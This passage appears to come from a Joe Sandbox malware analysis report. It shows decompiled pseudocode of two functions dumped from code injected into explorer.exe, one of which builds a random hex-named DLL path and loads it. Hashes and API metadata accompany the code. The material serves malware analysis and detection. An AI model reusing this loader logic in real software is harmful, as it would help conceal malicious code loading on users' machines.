                                                                                                                                                                        					_t66 =  *0x7bf81c; // 0x7d0000
                                                                                                                                                                        					_t62 = _t15;
                                                                                                                                                                        					_t67 = _t66 + 0xb0;
                                                                                                                                                                        					_v8 = _t62;
                                                                                                                                                                        					E007A9E51( &_v140, 0x40, L"%08x", E007AE2C5(_t66 + 0xb0, E007AA43D(_t66 + 0xb0), 0));
                                                                                                                                                                        					_t20 =  *0x7bf81c; // 0x7d0000
                                                                                                                                                                        					asm("sbb eax, eax");
                                                                                                                                                                        					_t25 = E007A9DF2(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000a0b) + 0xf8);
                                                                                                                                                                        					_t26 =  *0x7bf81c; // 0x7d0000
                                                                                                                                                                        					_t68 = E007A9A5A(_t26 + 0x1020);
                                                                                                                                                                        					_v12 = _t68;
                                                                                                                                                                        					E007A8BAF( &_v8);
                                                                                                                                                                        					_t32 =  *0x7bf81c; // 0x7d0000
                                                                                                                                                                        					_t34 = E007A9A5A(_t32 + 0x122a);
                                                                                                                                                                        					 *0x7bf91c = _t34;
                                                                                                                                                                        					_t35 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        					 *((intOrPtr*)(_t35 + 0x11c))(_t68, _t34, 0, 0x7bc9a0,  &_v140, ".", L"dll", 0, 0x7bc9a0, _t25, 0x7bc9a0, _t62, 0, _t61, _t65, _t47);
                                                                                                                                                                        					_t37 = LoadLibraryW( *0x7bf91c);
                                                                                                                                                                        					 *0x7bf914 = _t37;
                                                                                                                                                                        					if(_t37 == 0) {
                                                                                                                                                                        						_t38 = 0;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_push(_t37);
                                                                                                                                                                        						_t60 = 0x28;
                                                                                                                                                                        						_t38 = E007AF011(0x7bcb8c, _t60);
                                                                                                                                                                        					}
                                                                                                                                                                        					 *0x7bf918 = _t38;
                                                                                                                                                                        					E007A8BF4( &_v12, 0xfffffffe);
                                                                                                                                                                        					E007A8D6D( &_v140, 0, 0x80);
                                                                                                                                                                        					if( *0x7bf918 != 0) {
                                                                                                                                                                        						goto L10;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						E007A8BF4(0x7bf91c, 0xfffffffe);
                                                                                                                                                                        						goto L8;
                                                                                                                                                                        					}
                                                                                                                                                                        				} else {
                                                                                                                                                                        					L8:
                                                                                                                                                                        					if( *0x7bf918 == 0) {
                                                                                                                                                                        						_t46 =  *0x7bf850; // 0xeaf808
                                                                                                                                                                        						 *0x7bf918 = _t46;
                                                                                                                                                                        					}
                                                                                                                                                                        					L10:
                                                                                                                                                                        					return 1;
                                                                                                                                                                        				}
                                                                                                                                                                        			}


























                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                                        • String ID: %08x$dll
                                                                                                                                                                        • API String ID: 1029625771-2963171978
                                                                                                                                                                        • Opcode ID: 7011f57dce779352a811a248c8cd49b147a9c4d9447b8fc84fb3442fe74f9e3f
                                                                                                                                                                        • Instruction ID: e4e55f8742113d6495103cf0802d92f2c4a1ebb01000550ee378b8e76a159804
                                                                                                                                                                        • Opcode Fuzzy Hash: 7011f57dce779352a811a248c8cd49b147a9c4d9447b8fc84fb3442fe74f9e3f
                                                                                                                                                                        • Instruction Fuzzy Hash: C83180B2600504FFDB209B69EC49FDA32ACE786710F10C335F115D7191DA7C9E458769
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 47%
                                                                                                                                                                        			E007B3674(void* __eflags, long long __fp0, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
                                                                                                                                                                        				char _v5;
                                                                                                                                                                        				long long _v12;
                                                                                                                                                                        				short _v20;
                                                                                                                                                                        				signed int _t15;
                                                                                                                                                                        				void* _t16;
                                                                                                                                                                        				signed int _t22;
                                                                                                                                                                        				char _t25;
                                                                                                                                                                        				void* _t26;
                                                                                                                                                                        				signed int _t28;
                                                                                                                                                                        				intOrPtr _t29;
                                                                                                                                                                        				void* _t31;
                                                                                                                                                                        				char** _t32;
                                                                                                                                                                        				long long _t40;
                                                                                                                                                                        				long long _t41;
                                                                                                                                                                        
                                                                                                                                                                        				_t40 = __fp0;
                                                                                                                                                                        				_t15 = E007B358D(_a4);
                                                                                                                                                                        				 *_t32 = "msxml3.dll";
                                                                                                                                                                        				_t28 = _t15 & 0x0fffffff;
                                                                                                                                                                        				_t16 = E007AA43D();
                                                                                                                                                                        				_t26 = 0xf;
                                                                                                                                                                        				_t25 = 0;
                                                                                                                                                                        				_v5 = 0;
                                                                                                                                                                        				if(_t16 > _t26) {
                                                                                                                                                                        					L2:
                                                                                                                                                                        					_t3 = _t25 + 0x41; // 0x41
                                                                                                                                                                        					 *((char*)(_t31 + _t25 - 0x10)) = _t3;
                                                                                                                                                                        					_t25 = _t25 + 1;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t26 = _t16;
                                                                                                                                                                        					if(_t26 != 0) {
                                                                                                                                                                        						do {
                                                                                                                                                                        							goto L2;
                                                                                                                                                                        						} while (_t25 < _t26);
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				lstrlenW( &_v20);
                                                                                                                                                                        				_t29 = _a8;
                                                                                                                                                                        				_t22 = _a12 - _t29 + 1;
                                                                                                                                                                        				_a12 = _t22;
                                                                                                                                                                        				asm("fild dword [ebp+0x10]");
                                                                                                                                                                        				if(_t22 < 0) {
                                                                                                                                                                        					_t40 = _t40 +  *0x7bcf58;
                                                                                                                                                                        				}
                                                                                                                                                                        				_a12 = _t28;
                                                                                                                                                                        				_v12 = _t40;
                                                                                                                                                                        				_t41 = _v12;
                                                                                                                                                                        				asm("fild dword [ebp+0x10]");
                                                                                                                                                                        				if(_t28 < 0) {
                                                                                                                                                                        					_t41 = _t41 +  *0x7bcf58;
                                                                                                                                                                        				}
                                                                                                                                                                        				_v12 = _t41;
                                                                                                                                                                        				asm("fmulp st1, st0");
                                                                                                                                                                        				L007B8935();
                                                                                                                                                                        				return _t29 - _t22;
                                                                                                                                                                        			}


















                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrlenW.KERNEL32(?,000000B0,000000B0,?,00000000,000000B0,00000228), ref: 007B36BB
                                                                                                                                                                        • _ftol2_sse.MSVCRT ref: 007B36FE
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _ftol2_sselstrlen
                                                                                                                                                                        • String ID: msxml3.dll
                                                                                                                                                                        • API String ID: 1292649733-2158035192
                                                                                                                                                                        • Opcode ID: c7f653c49828070a857854ca3358ebed315098dafd5eec49469d251f66b3896d
                                                                                                                                                                        • Instruction ID: 3aaf3107e19acc2ef368db408f6b4c510f862ab69e70df359c3cb5663d8e6f09
                                                                                                                                                                        • Opcode Fuzzy Hash: c7f653c49828070a857854ca3358ebed315098dafd5eec49469d251f66b3896d
                                                                                                                                                                        • Instruction Fuzzy Hash: 80114C32A00249BBCF009F68EC096DD7F75FF94310F128669E92093241EF34C2A4C745
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%